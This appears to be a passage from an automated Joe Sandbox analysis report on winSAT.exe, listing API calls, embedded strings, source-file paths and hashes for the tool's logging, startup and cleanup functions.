                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF780FCE1A8), ref: 00007FF780FCDE37
                                                                                                                                                                                              • GetLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF780FCE1A8), ref: 00007FF780FCDE47
                                                                                                                                                                                              • GetTimeFormatW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF780FCE1A8), ref: 00007FF780FCDE77
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
• Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
• Associated: 00000016.00000002.2235480708.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000016.00000002.2235836355.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000016.00000002.2235948583.00007FF78110D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000016.00000002.2236004824.00007FF78110E000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000016.00000002.2236050867.00007FF78110F000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000016.00000002.2236087919.00007FF781110000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000016.00000002.2236398901.00007FF781167000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000016.00000002.2236447819.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: File$CriticalSectionTime$BuffersCloseCreateEnterErrorFlushFormatHandleLastLeaveLocalPointerSizeWrite
                                                                                                                                                                                              • String ID: --- START %d\%d\%d %S ---$AssessmentResultsPath$\winsat.log$base\winsat\exe\logging.cpp
                                                                                                                                                                                              • API String ID: 2715792050-1280026481
                                                                                                                                                                                              • Opcode ID: afa961589de5e33d04434e724ff52634cb44c442c321d86f7789c82287e94371
                                                                                                                                                                                              • Instruction ID: 3f17553e01c083db53c98a87b7a0eb64a4ffeb302e8207e9837a8d53a7ce1f13
                                                                                                                                                                                              • Opcode Fuzzy Hash: afa961589de5e33d04434e724ff52634cb44c442c321d86f7789c82287e94371
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1D614E31A08A12D6F710EB60E8512BDBB60FB85724FE09235DA5E427E4DF7CE549C760
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
• Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
• Associated: 00000016.00000002.2235480708.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000016.00000002.2235836355.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000016.00000002.2235948583.00007FF78110D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000016.00000002.2236004824.00007FF78110E000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000016.00000002.2236050867.00007FF78110F000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000016.00000002.2236087919.00007FF781110000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000016.00000002.2236398901.00007FF781167000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000016.00000002.2236447819.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorLast$ConsoleCtrlDirectoryFreeHandlerLibraryRemoveUninitialize
                                                                                                                                                                                              • String ID: > exit value = %d.$Cleanup and exit$ERROR: cannot initialize handle streams$PrivateError2$base\winsat\exe\main.cpp$A#
                                                                                                                                                                                              • API String ID: 2553899580-1836256727
                                                                                                                                                                                              • Opcode ID: 6dd3e8e8871fcca93b9664c5a0c3ca0b7b4fe5ba815eb1cd987d9de4614bc6fd
                                                                                                                                                                                              • Instruction ID: eba0fefe5323edecd7f6951bcc654dc0ed99d607fbc7df323768df9b37322008
                                                                                                                                                                                              • Opcode Fuzzy Hash: 6dd3e8e8871fcca93b9664c5a0c3ca0b7b4fe5ba815eb1cd987d9de4614bc6fd
                                                                                                                                                                                              • Instruction Fuzzy Hash: EE713D60E0D64295FB60BB11F8502BAEB50BF85758FF89035D94E027E5CEADF454CB60
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: EnabledEvent$ConsoleCountCtrlCurrentErrorHandlerLastProcessTick_snprintf_s_vsnprintf_s
                                                                                                                                                                                              • String ID: > exit value = %d.$Cleanup and exit$Main watch dog timer set to %4.1f seconds$PrivateError2$Watch dog timer is suppressed for a formal assessment$A#
                                                                                                                                                                                              • API String ID: 517596069-635825929
                                                                                                                                                                                              • Opcode ID: e9b66c82e45d1c1e17c8ffc869f7171ab270f1baad254f848c89b763af1bdd77
                                                                                                                                                                                              • Instruction ID: 9d5e768e4966704a50f72b56763f842e64822effccb221b6a0b3663842198185
                                                                                                                                                                                              • Opcode Fuzzy Hash: e9b66c82e45d1c1e17c8ffc869f7171ab270f1baad254f848c89b763af1bdd77
                                                                                                                                                                                              • Instruction Fuzzy Hash: AF91A021E0D68395FB60BB21B8502BAEB50BF85784FF89135D54D027E6DEACF454C760
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ConsoleCtrlErrorHandlerLast
                                                                                                                                                                                              • String ID: > exit value = %d.$Cleanup and exit$Main watch dog timer set to %4.1f seconds$PrivateError2$Watch dog timer is suppressed for a formal assessment$A#
                                                                                                                                                                                              • API String ID: 3113525192-635825929
                                                                                                                                                                                              • Opcode ID: 17f45fea3c477a3833a80e4da517990659cdc73acfab8a626d9da7683711fb8e
                                                                                                                                                                                              • Instruction ID: cf69efc1be32597f0da7506474621d105dd6e25b08f79bae8fce35835e400b13
                                                                                                                                                                                              • Opcode Fuzzy Hash: 17f45fea3c477a3833a80e4da517990659cdc73acfab8a626d9da7683711fb8e
                                                                                                                                                                                              • Instruction Fuzzy Hash: C8918161E0D68395FB60BB11B8512BAEB50BF85784FF89035D54D027E6CEADF454C720
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00007FF780FCE3AC: EventEnabled.ADVAPI32 ref: 00007FF780FCE41F
                                                                                                                                                                                                • Part of subcall function 00007FF780FCE3AC: GetCurrentProcessId.KERNEL32 ref: 00007FF780FCE440
                                                                                                                                                                                                • Part of subcall function 00007FF780FCE3AC: GetTickCount.KERNEL32 ref: 00007FF780FCE459
                                                                                                                                                                                                • Part of subcall function 00007FF780FCE3AC: _snprintf_s.MSVCRT ref: 00007FF780FCE48C
                                                                                                                                                                                                • Part of subcall function 00007FF780FCE3AC: _vsnprintf_s.MSVCRT ref: 00007FF780FCE4DB
                                                                                                                                                                                                • Part of subcall function 00007FF780FCE3AC: EventEnabled.ADVAPI32 ref: 00007FF780FCE500
                                                                                                                                                                                                • Part of subcall function 00007FF780FDC700: GetModuleHandleW.KERNEL32(?,?,00000001,00007FF780F94E15), ref: 00007FF780FDC71A
                                                                                                                                                                                                • Part of subcall function 00007FF780FDC700: FindResourceW.KERNEL32 ref: 00007FF780FDC79D
                                                                                                                                                                                                • Part of subcall function 00007FF780FDC700: SizeofResource.KERNEL32 ref: 00007FF780FDC7BE
                                                                                                                                                                                                • Part of subcall function 00007FF780FDC700: LoadResource.KERNEL32 ref: 00007FF780FDC7D8
                                                                                                                                                                                                • Part of subcall function 00007FF780FDC700: LockResource.KERNEL32 ref: 00007FF780FDC7F0
                                                                                                                                                                                              • SetConsoleCtrlHandler.KERNEL32 ref: 00007FF780FA0521
                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00007FF780FA0531
                                                                                                                                                                                              • CoUninitialize.OLE32 ref: 00007FF780FA05BC
                                                                                                                                                                                              • RemoveDirectoryW.KERNELBASE ref: 00007FF780FA05D1
                                                                                                                                                                                              • ReleaseMutex.KERNEL32 ref: 00007FF780FA0671
                                                                                                                                                                                              • CloseHandle.KERNEL32 ref: 00007FF780FA0684
                                                                                                                                                                                              • _CxxThrowException.MSVCRT ref: 00007FF780FA0B07
                                                                                                                                                                                              • _CxxThrowException.MSVCRT ref: 00007FF780FA0B23
                                                                                                                                                                                              • FreeLibrary.KERNEL32 ref: 00007FF780FA0B41
                                                                                                                                                                                                • Part of subcall function 00007FF780FA8A40: GetStringTypeExW.KERNEL32 ref: 00007FF780FA8A8A
                                                                                                                                                                                                • Part of subcall function 00007FF780FDB218: RegOpenKeyExW.KERNELBASE ref: 00007FF780FDB25C
                                                                                                                                                                                                • Part of subcall function 00007FF780FDB218: RegQueryValueExW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF780F99A08), ref: 00007FF780FDB29D
                                                                                                                                                                                                • Part of subcall function 00007FF780FDB218: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF780F99A08), ref: 00007FF780FDB2EE
                                                                                                                                                                                                • Part of subcall function 00007FF780FDB318: RegOpenKeyExW.ADVAPI32(?,?,?,?,001F0003,00007FF780FAE2AE), ref: 00007FF780FDB352
                                                                                                                                                                                                • Part of subcall function 00007FF780FDB318: RegSetValueExW.ADVAPI32(?,?,?,?,001F0003,00007FF780FAE2AE), ref: 00007FF780FDB389
                                                                                                                                                                                                • Part of subcall function 00007FF780FDB318: RegCloseKey.ADVAPI32(?,?,?,?,001F0003,00007FF780FAE2AE), ref: 00007FF780FDB39F
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Resource$Close$EnabledEventExceptionHandleOpenThrowValue$ConsoleCountCtrlCurrentDirectoryErrorFindFreeHandlerLastLibraryLoadLockModuleMutexProcessQueryReleaseRemoveSizeofStringTickTypeUninitialize_snprintf_s_vsnprintf_s
                                                                                                                                                                                              • String ID: > exit value = %d.$Cleanup and exit$ERROR: $ERROR: user does not have admin rights$PrivateError2$A#
                                                                                                                                                                                              • API String ID: 111406061-1341529956
                                                                                                                                                                                              • Opcode ID: c4fc51e546261cf886874d46cdc260991f628b714db9c0479af4ea7d99a7cc87
                                                                                                                                                                                              • Instruction ID: 3fb5d7dd92845651bfe2c1ad162d325ba46d21f225d1928fe9d88c1234673c16
                                                                                                                                                                                              • Opcode Fuzzy Hash: c4fc51e546261cf886874d46cdc260991f628b714db9c0479af4ea7d99a7cc87
                                                                                                                                                                                              • Instruction Fuzzy Hash: 4C716F60E0D64395FB60BB11F8502BAEB50BF85788FF49035D94D027E6CEADB454CB60
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00007FF780FDC700: GetModuleHandleW.KERNEL32(?,?,00000001,00007FF780F94E15), ref: 00007FF780FDC71A
                                                                                                                                                                                                • Part of subcall function 00007FF780FDC700: FindResourceW.KERNEL32 ref: 00007FF780FDC79D
                                                                                                                                                                                                • Part of subcall function 00007FF780FDC700: SizeofResource.KERNEL32 ref: 00007FF780FDC7BE
                                                                                                                                                                                                • Part of subcall function 00007FF780FDC700: LoadResource.KERNEL32 ref: 00007FF780FDC7D8
                                                                                                                                                                                                • Part of subcall function 00007FF780FDC700: LockResource.KERNEL32 ref: 00007FF780FDC7F0
                                                                                                                                                                                              • SetConsoleCtrlHandler.KERNEL32 ref: 00007FF780FA0521
                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00007FF780FA0531
                                                                                                                                                                                              • CoUninitialize.OLE32 ref: 00007FF780FA05BC
                                                                                                                                                                                              • RemoveDirectoryW.KERNELBASE ref: 00007FF780FA05D1
                                                                                                                                                                                              • ReleaseMutex.KERNEL32 ref: 00007FF780FA0671
                                                                                                                                                                                              • CloseHandle.KERNEL32 ref: 00007FF780FA0684
                                                                                                                                                                                              • _CxxThrowException.MSVCRT ref: 00007FF780FA0B07
                                                                                                                                                                                              • _CxxThrowException.MSVCRT ref: 00007FF780FA0B23
                                                                                                                                                                                              • FreeLibrary.KERNEL32 ref: 00007FF780FA0B41
                                                                                                                                                                                                • Part of subcall function 00007FF780FA8A40: GetStringTypeExW.KERNEL32 ref: 00007FF780FA8A8A
                                                                                                                                                                                                • Part of subcall function 00007FF780FDB218: RegOpenKeyExW.KERNELBASE ref: 00007FF780FDB25C
                                                                                                                                                                                                • Part of subcall function 00007FF780FDB218: RegQueryValueExW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF780F99A08), ref: 00007FF780FDB29D
                                                                                                                                                                                                • Part of subcall function 00007FF780FDB218: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF780F99A08), ref: 00007FF780FDB2EE
                                                                                                                                                                                                • Part of subcall function 00007FF780FDB318: RegOpenKeyExW.ADVAPI32(?,?,?,?,001F0003,00007FF780FAE2AE), ref: 00007FF780FDB352
                                                                                                                                                                                                • Part of subcall function 00007FF780FDB318: RegSetValueExW.ADVAPI32(?,?,?,?,001F0003,00007FF780FAE2AE), ref: 00007FF780FDB389
                                                                                                                                                                                                • Part of subcall function 00007FF780FDB318: RegCloseKey.ADVAPI32(?,?,?,?,001F0003,00007FF780FAE2AE), ref: 00007FF780FDB39F
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000016.00000002.2235480708.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000016.00000002.2235836355.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000016.00000002.2235948583.00007FF78110D000.00000004.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000016.00000002.2236004824.00007FF78110E000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000016.00000002.2236050867.00007FF78110F000.00000004.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000016.00000002.2236087919.00007FF781110000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000016.00000002.2236398901.00007FF781167000.00000004.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000016.00000002.2236447819.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Resource$Close$ExceptionHandleOpenThrowValue$ConsoleCtrlDirectoryErrorFindFreeHandlerLastLibraryLoadLockModuleMutexQueryReleaseRemoveSizeofStringTypeUninitialize
                                                                                                                                                                                              • String ID: > exit value = %d.$Cleanup and exit$ERROR: $PrivateError2$base\winsat\exe\main.cpp$A#
                                                                                                                                                                                              • API String ID: 568634108-2035168892
                                                                                                                                                                                              • Opcode ID: 5b44d8bc7320c3f65f7ebdfa15a1ea92a2b842721bc89c34c64084f1288bf5f3
                                                                                                                                                                                              • Instruction ID: 85ff0dde5a2c1aacf2fd228c149adaacd698421396f526f4ab912ffcb5aa7629
                                                                                                                                                                                              • Opcode Fuzzy Hash: 5b44d8bc7320c3f65f7ebdfa15a1ea92a2b842721bc89c34c64084f1288bf5f3
                                                                                                                                                                                              • Instruction Fuzzy Hash: 04716D60E0D64395FB60BB11F8502BAEB50BF85788FF89035D94E027E6DEADB454CB60
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000016.00000002.2235480708.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000016.00000002.2235836355.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000016.00000002.2235948583.00007FF78110D000.00000004.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000016.00000002.2236004824.00007FF78110E000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000016.00000002.2236050867.00007FF78110F000.00000004.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000016.00000002.2236087919.00007FF781110000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000016.00000002.2236398901.00007FF781167000.00000004.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000016.00000002.2236447819.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Close$ExceptionOpenThrowValue$ConsoleCtrlDirectoryErrorFreeHandleHandlerLastLibraryMutexQueryReleaseRemoveStringTypeUninitialize
                                                                                                                                                                                              • String ID: > exit value = %d.$Cannot process the command line$Cleanup and exit$ERROR: $PrivateError2$A#
                                                                                                                                                                                              • API String ID: 3961399675-4074399028
                                                                                                                                                                                              • Opcode ID: e3eef2f8cf22f96087c1aa5aeeb78a44921e2bf7882242dc61fbf64b7d77f375
                                                                                                                                                                                              • Instruction ID: b7aece9e0e32a323284f2877459c0652e36fcb842e7da6354a3f947f05f4350e
                                                                                                                                                                                              • Opcode Fuzzy Hash: e3eef2f8cf22f96087c1aa5aeeb78a44921e2bf7882242dc61fbf64b7d77f375
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1A615B60E0D64395FB60BB11F8502BAEB50BF85788FF8A035D54E027E6DEADB454CB60
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000016.00000002.2235480708.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000016.00000002.2235836355.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000016.00000002.2235948583.00007FF78110D000.00000004.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000016.00000002.2236004824.00007FF78110E000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000016.00000002.2236050867.00007FF78110F000.00000004.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000016.00000002.2236087919.00007FF781110000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000016.00000002.2236398901.00007FF781167000.00000004.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000016.00000002.2236447819.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CreatePath$AppendDirectoryStringUuid$EnvironmentErrorFreeLastTempVariable
                                                                                                                                                                                              • String ID: TMP$WinSAT
                                                                                                                                                                                              • API String ID: 1439655995-2813497950
                                                                                                                                                                                              • Opcode ID: bf8d1708ef15fce640154c456c56d2c4e118b59af927710beb8304350b9fbf7b
                                                                                                                                                                                              • Instruction ID: ad4cd6eab8dabea64f71c1b548da2f67ad577278d64df6b81f778db42f0bdccf
                                                                                                                                                                                              • Opcode Fuzzy Hash: bf8d1708ef15fce640154c456c56d2c4e118b59af927710beb8304350b9fbf7b
                                                                                                                                                                                              • Instruction Fuzzy Hash: 0541563660CA82D6EB50AB51E8842BEFB61FB85755FE0D031D64E436A8DF7CE449CB10
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00007FF780FDC700: GetModuleHandleW.KERNEL32(?,?,00000001,00007FF780F94E15), ref: 00007FF780FDC71A
                                                                                                                                                                                                • Part of subcall function 00007FF780FDC700: FindResourceW.KERNEL32 ref: 00007FF780FDC79D
                                                                                                                                                                                                • Part of subcall function 00007FF780FDC700: SizeofResource.KERNEL32 ref: 00007FF780FDC7BE
                                                                                                                                                                                                • Part of subcall function 00007FF780FDC700: LoadResource.KERNEL32 ref: 00007FF780FDC7D8
                                                                                                                                                                                                • Part of subcall function 00007FF780FDC700: LockResource.KERNEL32 ref: 00007FF780FDC7F0
                                                                                                                                                                                              • SetConsoleCtrlHandler.KERNEL32 ref: 00007FF780FA0521
                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00007FF780FA0531
                                                                                                                                                                                              • CoUninitialize.OLE32 ref: 00007FF780FA05BC
                                                                                                                                                                                              • RemoveDirectoryW.KERNELBASE ref: 00007FF780FA05D1
                                                                                                                                                                                              • ReleaseMutex.KERNEL32 ref: 00007FF780FA0671
                                                                                                                                                                                              • CloseHandle.KERNEL32 ref: 00007FF780FA0684
                                                                                                                                                                                              • _CxxThrowException.MSVCRT ref: 00007FF780FA0B07
                                                                                                                                                                                              • _CxxThrowException.MSVCRT ref: 00007FF780FA0B23
                                                                                                                                                                                              • FreeLibrary.KERNEL32 ref: 00007FF780FA0B41
                                                                                                                                                                                                • Part of subcall function 00007FF780FA8A40: GetStringTypeExW.KERNEL32 ref: 00007FF780FA8A8A
                                                                                                                                                                                                • Part of subcall function 00007FF780FDB218: RegOpenKeyExW.KERNELBASE ref: 00007FF780FDB25C
                                                                                                                                                                                                • Part of subcall function 00007FF780FDB218: RegQueryValueExW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF780F99A08), ref: 00007FF780FDB29D
                                                                                                                                                                                                • Part of subcall function 00007FF780FDB218: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF780F99A08), ref: 00007FF780FDB2EE
                                                                                                                                                                                                • Part of subcall function 00007FF780FDB318: RegOpenKeyExW.ADVAPI32(?,?,?,?,001F0003,00007FF780FAE2AE), ref: 00007FF780FDB352
                                                                                                                                                                                                • Part of subcall function 00007FF780FDB318: RegSetValueExW.ADVAPI32(?,?,?,?,001F0003,00007FF780FAE2AE), ref: 00007FF780FDB389
                                                                                                                                                                                                • Part of subcall function 00007FF780FDB318: RegCloseKey.ADVAPI32(?,?,?,?,001F0003,00007FF780FAE2AE), ref: 00007FF780FDB39F
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000016.00000002.2235480708.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000016.00000002.2235836355.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000016.00000002.2235948583.00007FF78110D000.00000004.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000016.00000002.2236004824.00007FF78110E000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000016.00000002.2236050867.00007FF78110F000.00000004.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000016.00000002.2236087919.00007FF781110000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000016.00000002.2236398901.00007FF781167000.00000004.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000016.00000002.2236447819.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Resource$Close$ExceptionHandleOpenThrowValue$ConsoleCtrlDirectoryErrorFindFreeHandlerLastLibraryLoadLockModuleMutexQueryReleaseRemoveSizeofStringTypeUninitialize
                                                                                                                                                                                              • String ID: > exit value = %d.$Cleanup and exit$ERROR: $PrivateError2$A#
                                                                                                                                                                                              • API String ID: 568634108-3205933662
                                                                                                                                                                                              • Opcode ID: 80feabcce4113e0c7242cd8f08c18fc0410cd75c9732d9c740b057425dfb8398
                                                                                                                                                                                              • Instruction ID: 41f9303fea11e08f8b0f61310dadd176dab2bcac367c636d48f430aef02ce605
                                                                                                                                                                                              • Opcode Fuzzy Hash: 80feabcce4113e0c7242cd8f08c18fc0410cd75c9732d9c740b057425dfb8398
                                                                                                                                                                                              • Instruction Fuzzy Hash: 47716D60E0D64395FB60BB11F8502BAEB50BF85788FF89035D94E027E6CEADB454CB60
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000016.00000002.2235480708.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000016.00000002.2235836355.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000016.00000002.2235948583.00007FF78110D000.00000004.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000016.00000002.2236004824.00007FF78110E000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000016.00000002.2236050867.00007FF78110F000.00000004.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000016.00000002.2236087919.00007FF781110000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000016.00000002.2236398901.00007FF781167000.00000004.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000016.00000002.2236447819.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Close$EnabledEventExceptionOpenThrowValue$ConsoleCountCtrlCurrentDirectoryErrorFreeHandleHandlerLastLibraryMutexProcessQueryReleaseRemoveStringTickTypeUninitialize_snprintf_s_vsnprintf_s
                                                                                                                                                                                              • String ID: > exit value = %d.$Cleanup and exit$PrivateError2$WinSAT registry node is missing and could not be created$A#
                                                                                                                                                                                              • API String ID: 3960188384-1753098087
                                                                                                                                                                                              • Opcode ID: bd410cd55e264f000d01232e2567f6f248b7545a471fa6acb62d77860f969491
                                                                                                                                                                                              • Instruction ID: 9ccf92073b8bbb810230f9e1162e53d2c47b1d98f0e37fc5f67b0951abea98f0
                                                                                                                                                                                              • Opcode Fuzzy Hash: bd410cd55e264f000d01232e2567f6f248b7545a471fa6acb62d77860f969491
                                                                                                                                                                                              • Instruction Fuzzy Hash: 49615F60E0D64395FB60BB11F8502BAEB50BF85788FF89035D54D027E5CEADB454CB61
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Close$EnabledEventExceptionOpenThrowValue$ConsoleCountCtrlCurrentDirectoryErrorFreeHandleHandlerLastLibraryMutexProcessQueryReleaseRemoveStringTickTypeUninitialize_snprintf_s_vsnprintf_s
                                                                                                                                                                                              • String ID: > exit value = %d.$Cleanup and exit$ERROR: Failed to determine whether WinSAT was launched by AXE.$PrivateError2$A#
                                                                                                                                                                                              • API String ID: 3960188384-757361707
